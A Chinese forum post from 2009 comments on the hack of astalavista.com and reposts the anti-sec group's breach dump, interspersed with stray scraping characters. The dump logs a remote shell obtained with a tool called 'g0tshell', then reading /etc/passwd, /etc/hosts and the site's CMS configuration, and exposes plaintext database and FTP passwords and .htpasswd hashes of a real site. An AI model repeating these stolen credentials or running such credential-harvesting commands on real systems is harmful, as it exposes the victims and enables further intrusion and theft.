里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。: D6 J/ F& J/ d9 T
9 q# }/ I* ^( {& ^. m: @' k- d' x
[root@front3 ~]# curl -I litespeedtech.com
5 q6 `" E, U5 r' MHTTP/1.1 200 OK/ }: T! c5 n, ~7 E' z
Date: Fri, 05 Jun 2009 22:54:51 GMT
$ p& w( r. H( h) E6 L( N0 U4 MServer: LiteSpeed, S: C) Y, E3 J! q9 K$ U% j
: J( e1 Q- W0 X- N B另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-# g1 s; }, U0 M: ~7 e) D
: P- n! g! Z. A9 P
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
$ b; F$ g$ S8 N$ k$ l3 ^
+ g# \$ C' V7 F# T1 f: T- L2 P9 A. Z5 y+ B% k
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
* r8 T5 {) R2 f1 L' J1 \! E8 ~/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \, G/ R- `: q- ^# ]
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
. G/ u( p/ E2 |8 Q3 p% [6 X# |/ f\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /7 A* O* x4 T1 P3 Q7 N7 y. J* a
\/ \/ \/ \/ \/ \/ \/4 ^) X$ v6 X9 ^; k* K
The Hacking & Security Community
2 g( d& v- @' A* u. `[+] Founded in 1997 by a hacker computer enthusiast, N/ p; C. ~9 W- Y
[-] Exposed in 2009 by anti-sec group
" Y. ?+ x& u( F
7 _: k& G. g; HFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
6 E3 O8 X) M2 S1 e& M>> 03. Who’s behind the site?: t& c, [9 x/ U: M* A
>>
8 k2 I; J5 x: I4 X>> A team of security and IT professionals, and a countless number of contributors from all over the world.- ~* ]0 x- l: f# G
1 J" }0 F% U$ L' ~' T>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
) u8 a8 C. e$ p6 Q8 Z>>
0 _5 @+ I v- n$ m% E4 ?>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
4 k: s) Y9 V) B. |; W3 omilitary institutions.* W, Q6 v, P, {, r5 Z: ~5 H
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.( @* l; v9 L# G0 N" M
5 [0 v5 b3 |' O& S
Why has Astalavista been targeted?
( L7 _8 C: M) t9 r9 P, q* b! @8 v0 t1 e0 K
Other than the fact that they are not doing any of this for the “community” but4 f3 W( X+ D1 i% r' E" o. ?
for the money, they spread exploits for kids, claim to be a security community
. w4 G" B- q% z- Q% v/ d1 S+ p5 z% H' G(with no real sense of security on their own servers), and they charge you $6.66. l- M0 c: O( C! W: m# ^9 U
per months to access a dead forum with a directory filled with public releases5 q: g5 Y8 h C+ c6 o+ ^' i$ ~) @
and outdated / broken services.9 Q5 T$ K5 G" O3 D0 Y/ f
' E+ O" C, f; H! ~" f6 O
We wanted to see how good that “team of security and IT professionals” really is." I+ I8 z; u* k6 M1 [' B
4 U6 _+ j( { K6 C5 lLet’s begin.
% V" P( l* Y5 B! k- d/ h$ B) O3 N8 G/ l; @8 w2 E' P) \- H: g/ d
anti-sec:~# ./g0tshell astalavista.com -p 80- Q# d& |, {$ N& H
[+] Connecting to astalavista.com:80
% [/ a0 _* f$ v& V B[+] Grabbing banner…
4 t n" a5 V6 M. FLiteSpeed8 l- l# ]+ w. E V0 c# c$ o0 @2 `
[+] Injecting shellcode…) J2 X" }8 E/ H' @5 M- O. X+ l+ k
[-] Wait for it
- c8 n+ ?* N) f. \
' g" Q- F! l/ \[~] We g0tshell
7 U' V( U, Q) {5 K7 puname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
/ Z. Z- m/ P# ^/ `/ R7 KID: uid=100(apache) gid=500(apache) groups=500(apache)
: j3 H5 }" W% D6 ~1 ~
) O" x5 r5 ~2 a* tsh-3.2$ cat /etc/passwd
8 q3 C1 G2 [# n8 n5 nroot:x:0:0:root:/root:/bin/bash
6 G( c! x( {# ]- O$ R: c( L9 Ibin:x:1:1:bin:/bin:/sbin/nologin, v, S/ X3 E1 l7 r! G
daemon:x:2:2:daemon:/sbin:/sbin/nologin
' n# V# M7 t+ X# j0 }" Xadm:x:3:4:adm:/var/adm:/sbin/nologin% Y7 d ^$ f/ B, w& p' {
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin, K& e/ p: Z6 e# P$ {
sync:x:5:0:sync:/sbin:/bin/sync. u; e# _- h0 r) H) y4 \3 Q
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
, U* S5 L' Y7 a, d: Rhalt:x:7:0:halt:/sbin:/sbin/halt2 t0 r/ K4 i- r& i$ N! X
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin: ~9 c7 J n3 Y! Y" n2 Z" F5 n
news:x:9:13:news:/etc/news:
2 W1 U2 x! q1 C6 _) l9 uuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
+ e7 l& |: E5 |" X1 w# Boperator:x:11:0perator:/root:/sbin/nologin
! O2 j8 x1 S: ^& \- a. ?6 ]: }* }games:x:12:100:games:/usr/games:/sbin/nologin, q/ }7 C& E; a* V, C' w6 ?% u
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin9 q p+ g% x, N3 s# f$ [6 @
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
2 G# i# u$ Y. z1 w# {nobody:x:99:99:Nobody:/:/sbin/nologin
" A9 [1 u: g/ h$ x5 P6 H8 Nrpm:x:37:37::/var/lib/rpm:/sbin/nologin1 i% i2 R7 E' w, [, [3 p7 ~) t
dbus:x:81:81:System message bus:/:/sbin/nologin
4 X4 a4 u- t1 _3 onscd:x:28:28:NSCD Daemon:/:/sbin/nologin$ p ~) Y. K3 P1 @; a# h
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
& O1 @; ]0 O1 e3 z Xsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin- Y" {/ E+ M8 O, b- v
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin3 j) ?4 }: r/ U: O
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin( M( x8 R+ y2 Z0 ~% Y& s9 Q
rpc:x:32:32ortmapper RPC user:/:/sbin/nologin8 u7 l# O$ ?# q- @
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin+ H) P5 V1 R1 z7 r
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
6 M: g7 k' f7 K+ N- O8 r9 zsshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
. F. P. w# t# \# k7 M8 a6 \pcap:x:77:77::/var/arpwatch:/sbin/nologin' ?: K+ p: K0 C" E, H$ T
named:x:25:25:Named:/var/named:/sbin/nologin
" J) i* S0 M" d& ~7 X5 y) Hapache:x:100:500::/var/www:/bin/false, W r6 E: o% q! B
diradmin:x:101:101::/usr/local/directadmin:/bin/bash3 r- c- _- P7 ^/ Y: K* e
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
: ]6 t3 J6 N0 S' ewebapps:x:500:501::/var/www/html:/bin/bash! E8 S) Z- V: j+ E( ~
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
& t/ \8 e4 n7 Z" B8 {& F2 b% Eadmin:x:501:502::/home/admin:/bin/bash: M: `5 [* k. {) \1 Z% [+ o: Q
jon:x:502:503::/home/jon:/bin/bash/ ^" J5 b4 @! k* t! P6 {' |
com:x:503:504::/home/com:/bin/bash
0 G0 p; b$ _$ U6 }: ]: mntp:x:38:38::/etc/ntp:/sbin/nologin: p4 z, n% s0 ~2 o
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin4 M8 ]" z# M8 u$ |7 j* B
astanet:x:504:505::/home/astanet:/bin/bash1 d# ~! E8 f6 r( O* `
avahi:x:70:70:Avahi daemon:/:/sbin/nologin3 G, q* S. j$ }
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin3 T: U0 q& ]. u1 S
, h) I! \( l$ K1 j$ F- A
sh-3.2$ cat /etc/hosts
& u6 i% @* o& x; L0 ~$ ] E: @5 R# Do not remove the following line, or various programs B4 ^6 t6 b* T5 s
# that require network functionality will fail.
0 W' e3 E$ r) R! L6 n$ q+ Y127.0.0.1 localhost.localdomain localhost$ L' p/ B6 o2 w0 T
::1 localhost6.localdomain6 localhost6
2 J; A/ M7 e" c: M5 D1 K; w8 o80.74.154.172 asta1.astalavistaserver.com; F5 o& @/ O8 b$ ]& t. {- v
) _" n9 |: m0 C" M- f( X2 ~sh-3.2$ pwd
( x2 C1 s" y! e1 n- J$ ~/home/com/public_html
( |: C) R6 I3 ^% Q" M$ ~1 v" K5 Z
sh-3.2$ ls -la; n% y+ m6 ^; x* G& }$ h
total 18460
7 j# h1 ]( u+ X1 ]: Z9 hdrwxr-xr-x 30 com apache 4096 May 28 17:06 .
' {+ D. B+ s& g9 X7 u' odrwx–x–x 11 com com 4096 Jun 25 2008 ..
/ E' |/ _: ^" R X; T9 g" zdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin% P7 J$ O: L4 @% \
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache+ M# F+ ~& I- ?! U; l8 `8 n3 D
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
- I: u3 y/ ?; c+ i1 `; edrwxrwxrwx 2 com com 4096 May 19 00:50 config
' ~1 p( k% m$ V% a# K! {drwxr-xr-x 2 com com 4096 Mar 20 11:05 core1 N& ~4 @9 I, J3 x. y; y
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules9 U: i0 P" k! I) ^" z
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing, Q3 A" w8 p9 |0 W
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo4 i7 l6 H( m; `
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__; V/ ^; X/ J5 L1 h1 ?
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php) j- I& Z8 y* [5 ]
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd+ L8 ]/ i) n b
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
% q( t) s/ k( D& ?4 V! S" V-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
. m5 k9 ~8 x @$ R0 {+ L# ldrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
: `; j" b1 q* W& e-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess! d+ a* N) S/ m) U6 J5 E
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak- l# r1 l( r% m4 K5 P T
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
9 E8 @) f* F+ X- kdrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
y" f2 o1 `8 ~3 q b/ v$ Adrwxrwxrwx 14 com com 4096 Feb 2 19:29 images
& {9 R- }; t5 L- ^1 K( i* v-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php! H, ^' N, o+ @; R. g
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
7 V/ `4 J/ A7 \# ddrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang; P' A( E2 ^: F+ D
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib0 K6 D; D# I) C7 D
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
% l7 q4 L6 c7 S0 c3 p+ Zdrwxr-xr-x 8 com com 4096 May 11 12:48 modifications
: H: _9 R. G0 ~& d* xdrwxr-xr-x 34 com com 4096 May 28 16:30 modules8 m( v( X: A- m' |6 e6 S
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
4 q! c" w2 z3 A/ B4 g' Qdrwxrwxr-x 22 com com 4096 May 28 17:06 _new$ x# L* O7 Z P4 x# M( H
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old& K H6 l0 {* W% h M6 O& v
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
( c* `0 O# g$ ^$ S kdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
+ ^5 b: ~+ r: K9 ^-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
5 f1 r6 a- a1 d' u- [/ |! N-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml( X6 [0 l3 l+ T
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php# c7 ?: H i& [- W
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
- a% h1 R h- N) |4 Wdrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp, y; J) O- t L$ g1 {
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam* b a$ w1 k! R+ R$ ]6 Z
8 k2 c" V( a) c7 m1 o+ J8 I
sh-3.2$ head -20 index.php
) A; X; u2 @0 U" }<?php* b' J) g4 C' C
& O$ E3 z" {7 I* F
/**
5 M7 _4 J/ Z0 E3 A$ }1 d1 q* The main page for the CMS. N$ P5 g- g2 g; r7 j
* @copyright CONTREXX CMS - COMVATION AG2 c3 t3 p$ V7 S0 O
* @author Comvation Development Team1 U! ]% ]/ Z% y: t5 P
* @version v1.0.9.10.1 stable
5 \* W# b. ^0 T$ ^, ~* l% f# T* @package contrexx, @% p* a x+ z8 P$ r2 P5 d# A
* @subpackage core
$ p& y9 l7 K4 j9 B4 B# o* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
* n7 O* X' j$ {* \3 z* @since v0.0.0.09 T- h% c% B: h1 H+ _$ z) s8 |
* @todo Capitalize all class names in project
( y5 e; D- @& Q# H1 q4 ~: J* @uses /config/configuration.php! }2 T& A" @ U; v0 Y, G
* @uses /config/settings.php
# U @# I4 K! L) a* @uses /config/version.php/ R2 V* N$ Q5 n1 w9 u7 @
* @uses /core/API.php
9 V, V' r+ d; f* @uses /core_modules/cache/index.class.php
* S! _$ z- H) _* r* @uses /core/error.class.php) G; \; v$ _5 c7 D& h
* @uses /core_modules/banner/index.class.php8 f8 }" X* k! V3 U. b, X. d3 K
* @uses /core_modules/contact/index.class.php
8 y/ U; U I T a
) {- [+ h! ~( M4 o3 osh-3.2$ cd config/
7 M! A2 Q7 i+ R, fsh-3.2$ ls -la
5 y7 ^& L& u4 f$ ntotal 32
9 x! e& L( q8 L2 `drwxrwxrwx 2 com com 4096 May 19 00:50 .
8 n* Q* q% f W: u3 s. e2 Fdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
5 B& t8 s6 n3 ~-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php; v; i. G- `: |2 f) m
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php& \8 i) c% b4 i# Q6 h) V# q/ L4 b! t
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
* K \" f+ r6 P( j" d- L2 K1 M; `/ ]-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
. O+ A: c/ l Q% E. N6 {: @% a3 M2 j- P7 m5 {! u
sh-3.2$ cat configuration.php
/ g! d# q* k3 r0 ?1 ~, y- x9 C[snip]
- D) K9 r; d7 p2 W$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost% a. [/ B( C* ~0 X! F
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
+ m0 U6 S7 O+ B" i$ s) {$ d# s$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
6 v( O/ _; U8 d1 R- P$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username4 E4 \& \3 i; Y* G V
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password4 J2 Z% E4 v4 p4 W
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)# R( x7 p) q9 h' A
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..): a$ b- U6 d3 b
[snip]
6 O$ p# {" q, d: ^; n0 ~$_FTPCONFIG['is_activated'] = true; // Ftp support true or false9 h+ v! [. |2 l7 ~: l `, ?' ?2 T
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode2 f7 T6 H4 P% ?- c
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost# \& q2 ]4 q |4 @- I
$_FTPCONFIG['port'] = 21; // Ftp remote port2 o8 j/ N0 L+ S* b2 o: i( {8 k" ^+ _
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username( K$ G% p2 O; L/ O8 M
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
) ~) V1 {/ O7 w9 i; l4 O2 I$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms3 `& { r7 F1 v" ^1 d+ o5 G; `
# A2 W. {6 `3 H& j& u+ Qsh-3.2$ cd ..% V; [ h& _: P2 n1 p
sh-3.2$ cd dvd/
) n% `( r* F( u+ K2 j4 ish-3.2$ ls -la
0 I {2 U( D3 Dtotal 2913780
* G& B8 d' }9 X$ f7 Udrwxr-xr-x 2 com com 4096 Sep 9 2008 .
# `' B) T& f. W: e3 l0 B! Z4 S' edrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
' E X+ d+ Z; i6 |-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
1 g. R% ]( D' S- k-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
( ^# V3 w2 V; q7 |-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
. m: [" Z5 {/ F# z G1 |+ w" G-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess. L) N8 M3 y8 L) z9 m& w7 a# Y; q
; s8 ?# X9 ^$ N0 Q0 ~/ `sh-3.2$ cat .htaccess. ]8 Z" M3 e4 U( F8 M) d
authType Basic
$ ?- T$ W. M% T8 x& c: JauthName DVD
; [7 C$ b ^3 S9 i* l/ j2 }3 E1 [, g- zauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
4 w* w; ]& L4 f vrequire valid-user+ |- x' h1 X4 O* ~
2 m. C, y+ x" G" Z* jsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
) q9 w5 b' t$ d( W, |% M- H$ N6 mDVDdownload:CRD8cuY6.MPT6
5 q0 p2 w+ Q0 ^8 xDVDdownload2:CR8a36.wluFMg; o% }) _5 A% t4 J( n$ w a5 Z
; L7 X9 ], A5 _8 h0 H' t. X& Ish-3.2$ cat test.php
2 _8 A1 X! P# c4 k3 `$ Y<?php
! i5 f+ d! V) a3 M( \$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;- O$ d0 x, A+ D
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
" o6 M% {) H! G( qecho $url;* O7 ~: n# J3 r7 V
?> E' Q' v% P, O! s# @. w$ t' n7 g1 J
; ~8 E. S- O. Tsh-3.2$ cd modifications/
! G* d4 a2 e$ q& J) @sh-3.2$ ls -la9 A; l4 K7 ^* D7 p d
total 328 I& X. k2 {4 B8 p7 {
drwxr-xr-x 8 com com 4096 May 11 12:48 .+ y S' z! T+ G( k! O
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..2 g; t x* _. \2 M0 \$ ^' u
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng! o# s7 J; @1 t( ^1 S
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs+ J" W* Q& S1 c
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
8 ?; b: J, p& X7 ]' `9 Cdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
: ]1 Q9 ~) B4 T: _5 A- f! Y Jdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search
$ |; J7 ]: G) Ndrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
, w8 R( L/ O1 h( {* w, T' C% ?7 u7 H7 p
sh-3.2$ ls -R5 j# | } J$ U- Q1 k6 b; T
.:
! Q( z; P0 g* scom_avtng cronjobs onlinetools pjirc search _tmp$ o% U% j7 w0 `9 n$ n( \: a
! H: i6 N) k0 u
./com_avtng:
8 j' B* H% @! C! B: savtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts9 p" E2 a+ e. V* R
" r' k z# c6 m; x! Q./com_avtng/scripts:& K5 J8 A; _6 Z( n0 I$ b; F
popunder.js
3 ]3 w% y& Q- Q9 o7 O6 a
5 `# M) K! g& \" H* P./cronjobs:% ^8 Z* \9 Y# r! c2 {+ K( _
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
2 n; w; A2 y; U) Y" x3 h, R& f B" g, H& O% E) G
./cronjobs/tmp:
2 u. U! K, f5 l; O9 |contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv {, ~8 C# z3 h( J- f. L7 r
; v; Y4 j% O: m$ W./onlinetools:9 H/ k7 Y- {' s2 o S% \
index.php a& l' p/ t+ Y$ W }
* {" p8 Y' V( G# K: R: g./pjirc:
- ?: @, W0 B# ~a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt+ c; E. R- H/ x1 J2 C( A. P
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
, M; Q0 A/ S$ t t1 Q) [, q& Nbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
4 k! T! ]; [- ?$ U8 Z5 k
0 C3 C j8 _% n/ t' @: G+ W./pjirc/img:/ J# ^8 t7 W# J( o8 |, ^) z$ b
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
2 @# Z" Y* t1 Carbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
' z$ z/ j+ }5 R# |$ ?6 Nverre-eau.gif& W$ s/ {( R! E ?% G8 O* e* s
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
1 M& V7 G3 ?2 v% E5 X. `* qverre-vin.gif
K! t; D) E& o5 q. zballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif5 Q+ A0 r1 m, A, Y& F& n
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif" z6 V+ |( H6 }! l# s# l9 G
0 `: I) R6 B4 W: L2 L# r
./pjirc/snd:
/ t- M1 ~# p! i% X) Pbell2.au ding.au
/ [$ c5 M l( X
/ J& d: }( V3 `1 d./search:
: M" g% t8 Z X& q/ rsearchEngines.php search.php
n1 A" }1 z$ T. N! p' E1 P+ U5 q& k9 J5 \5 ~3 J
./_tmp:, A& p" z8 k' ?* P1 G7 z$ c
defaultPorts.php defaultPorts.txt
6 J) Z+ R7 A+ I# B) u& p- V$ j* ?
" d" d6 y" \2 M0 Csh-3.2$ cd cronjobs/
- D2 [; C9 F5 c8 u2 Y5 R; u9 n5 Osh-3.2$ cat exploits.php
) x1 z4 H( o: Q! l( ~[snip]- Y. W9 P) q7 ~: r$ X2 X
$categories = array();. T' O: ~1 D/ v* Y- q `
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;7 l. S/ t4 R. R, @0 Y$ O. k
$expolits = file($milw0rmFile);( T3 y9 I- f! \3 c6 E: D* P1 l
$comExploits = array();. S# N& J- V E
[snip], k/ Y7 e6 W) f) R* V4 R
// manage data1 H `3 q% x+ N7 y) W6 }" X. Y
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640' x8 x/ {4 p+ n! j
& _: J* N9 Q: @* N. A // get path and title
$ l4 j* Z+ o" p $expolits[$x] = trim($expolits[$x]);% R$ m- i& X1 F6 B8 T
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));: J9 D4 w$ |, v
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
& ~, }" e5 f% v& a: ]; B$ n; S: H3 `5 ~5 G6 `! I0 B' L
// check if file exists
' M4 r$ e3 c7 x2 F if (file_exists($path)) {0 {' W# f$ ?* p0 P1 q
S8 F; [0 w6 F( P& k
$text = file_get_contents($path);
1 a! b. f u: j+ Z `# j, |' j& G8 s
// get content and date" z) Y9 n6 v4 a6 j* H" z! S
//$text = htmlspecialchars($text, ENT_QUOTES);
( U: X1 |- i, e$ X $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));) ] ~+ o$ A- s5 n7 s; V3 r* e
if ($tmptext != ”) {
E3 B7 K- ~7 D. x $text = $tmptext;4 N1 M) \9 ~, E. }. D; I
} else {( N4 S+ U1 b, d) E& }
$text = addslashes(htmlentities($text, ENT_QUOTES));
$ [+ V. j2 A, n; i( q+ M% @/ B, ~ }) ]- _# k6 j: u) K( J; a
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));4 B- S' O/ T. e0 G3 c7 n
$tmp = explode('-', $date);) N* K/ N* }# x% S2 E
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
8 V( u% C+ [# z $cat = getCategory ($path);6 }% D# s9 ]& x- G* F2 E
$ext = pathinfo(basename($path));
9 l. X* a3 Q% {4 g T1 ]9 R $ext = $ext['extension'];$ m3 I/ O# I) w& B
$qStr = ”% _' e" K3 m! J+ V% ]. P/ K" N
SELECT `id`
6 _4 b7 J/ k3 n* U FROM `contrexx_module_exploits`0 X* S" c @/ @; a1 j5 N
WHERE `title` = ‘” . $title . “‘+ Q( |' F# C1 N# k7 ?: k
AND `date` = ‘” . $date . “‘3 s' p+ p9 H& |* X4 M/ l3 ~( e
“;2 F, o) w- b6 p# N$ {5 Y
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;( d; E. E3 o* v
$q = $_objDB->query($qStr);7 N* m5 l1 A/ p+ b0 d: d
/ Y2 J& c! v" ?& C% v: `
if ($q->numRows() == 0) {9 U, l8 w- c ^+ \' g. W; [7 m
9 O, ^- S8 u% q5 d
// prepare array
, B5 e! t: j% K$ D! A $comExploits[$x]['date'] = $date;
* ?5 I( @* r* x) N7 q: L5 C $comExploits[$x]['title'] = $title;
0 A& f/ Q7 x; A5 L3 K- q( M $comExploits[$x]['author'] = ‘milw0rm’;
: |- U& i: p" C$ ] r $comExploits[$x]['text'] = $text;; o/ K; d* E: e$ T5 q( y- P! Y: c
$comExploits[$x]['source'] = $ext;
( N7 h! j& V- k# i V$ q5 W- K $comExploits[$x]['url1'] = ”;
, [+ ^6 r9 R: S6 a+ Q' P $comExploits[$x]['url2'] = ”;
+ L. }8 n* m# V7 M" V $comExploits[$x]['catid'] = $cat;/ p8 j9 I* L7 J) _
$comExploits[$x]['lang'] = ‘2′;
0 P' A3 |9 C: @$ R+ ] $comExploits[$x]['userid'] = ‘12′;6 L- w" D2 t' X- _( j3 c# k# g4 S- ~
$comExploits[$x]['startdate'] = ‘0000-00-00′;
* X5 Z \, a$ i! q$ E- L $comExploits[$x]['enddate'] = ‘0000-00-00′;' _$ z, q6 l& B+ U+ k
$comExploits[$x]['status'] = ‘1′;' q# Q5 R" d, @
$comExploits[$x]['changelog'] = $date;
2 d% a3 R9 f9 _$ n9 o( @( F; v; a1 k
+ S+ J. \6 g( l/ o% l }( g" j+ p9 ~0 ^! J% M2 n& e. X
[snip]
9 k0 `! Q/ M! e: x $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>% ? j. C' b3 o" V
<rss version=”2.0″>
/ H7 @; ~% t- v0 C% m <channel>, C/ Z7 \ i1 ]5 z
<title>ASTALAVISTA.com - Exploits</title>
, i5 }1 g6 t9 t! a i" X& ]! k; ]5 l7 ] <link>http://www.astalavista.com/exploits</link>1 V7 d/ w7 D/ Y8 F
<description>All availably Exploits.</description>& f. f4 S0 I5 V4 B# b
<language>en-us</language>
